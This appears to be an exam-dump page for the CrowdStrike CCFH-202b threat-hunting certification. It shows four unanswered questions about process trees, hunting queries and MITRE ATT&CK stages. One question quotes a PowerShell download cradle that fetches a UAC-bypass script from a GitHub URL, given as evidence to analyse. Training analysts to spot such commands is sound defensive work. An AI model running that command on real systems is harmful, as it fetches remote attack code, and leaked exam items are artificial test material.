| Exam Name: | CrowdStrike Certified Falcon Hunter | ||
| Exam Code: | CCFH-202b Dumps | ||
| Vendor: | CrowdStrike | Certification: | CCFH |
| Questions: | 60 Q&A's | Shared By: | moses |
You receive an alert for the following process tree:
w3wp.exe > powershell.exe > cmd.exe > whoami.exe > net1.exe Which of the following describes what has occurred?
You want to find all executions of a file on older Windows operating systems. You also want to include the Windows OU and focus on OUs with highly privileged systems and users. Which query will include the file name, operating system, and OU?
An attacker created a scheduled task which executes a remote management application. Which MITRE ATT & CK Matrix for Enterprise stage is this an example of?
While performing a hunt for unusual PowerShell commands, you discover the following command being run on a single host:
powershell.exe "(New-Object Net.webclient).Downloadstring('https://raw.githubusercontent.com/.../invoke-AppPathBypass.ps1')"
The process tree for this command looks like this:
winlogon.exe > userinit.exe > explorer.exe > powershell_ise.exe > powershell.exe All of the commands are run during normal working hours under the account of a user from the IT department. What should be your next steps in the investigation?